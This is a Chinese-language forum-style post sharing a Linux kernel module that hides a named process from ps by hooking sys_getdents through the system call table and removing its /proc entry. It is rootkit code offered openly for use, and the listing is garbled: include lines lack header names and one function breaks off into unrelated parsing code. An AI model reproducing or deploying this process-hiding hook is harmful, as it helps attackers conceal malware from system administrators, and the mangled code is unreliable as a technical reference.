很早以前的小程序,比较简单但是觉得有趣 原理很简单,Linux查看进程的命令ps是通过系统调用sys_getdents实现,sys_getdents用户获取一个指定路径下的目录条目,实际上就是枚举 /proc/ 下的pid,这样我们只需要hook一下sys_getdents,把相应的要隐藏的pid信息去掉即可。
以下是LKM代码,在Linux-2。6。
14测试并运行成功 #include #include #include #include #include #include #include #include #define CALLOFF 100 //使用模块参数来定义需要隐藏的进程名 char *processname; module_param(processname, charp, 0); struct { unsigned short limit; unsigned int base; } __attribute__ ((packed)) idtr; struct { unsigned short off1; unsigned short sel; unsigned char none, flags; unsigned short off2; } __attribute__ ((packed)) * idt; void** sys_call_table; asmlinkage long (*orig_getdents)(unsigned int fd, struct linux_dirent64 __user *dirp, unsigned int count); char * findoffset(char *start) { char *p; for (p = start; p = str; ptr--) { if (*ptr '9') return (-1); res += (*ptr - '0') * mul; mul *= 10; } return (res); } struct task_struct *get_task(pid_t pid) { struct task_struct *p = get_current(),*entry=NULL; list_for_each_entry(entry,&(p->tasks),tasks) { if(entry->pid == pid) { printk("pid found\n"); return entry; } } return NULL; } static inline char *get_name(struct task_struct *p, char *buf) { int i; char *name; name = p->comm; i = sizeof(p->comm); do { unsigned char c = *name; name++; i--; *buf = c; if (!c) break; if (c == '\\') { buf[1] = c; buf += 2; continue; } if (c == '\n') { buf[0] = '\\'; buf[1] = 'n'; buf += 2; continue; } buf++; } while (i); *buf = '\n'; return buf + 1; }
以上是我对于这个问题的解答,希望能够帮到大家。
全部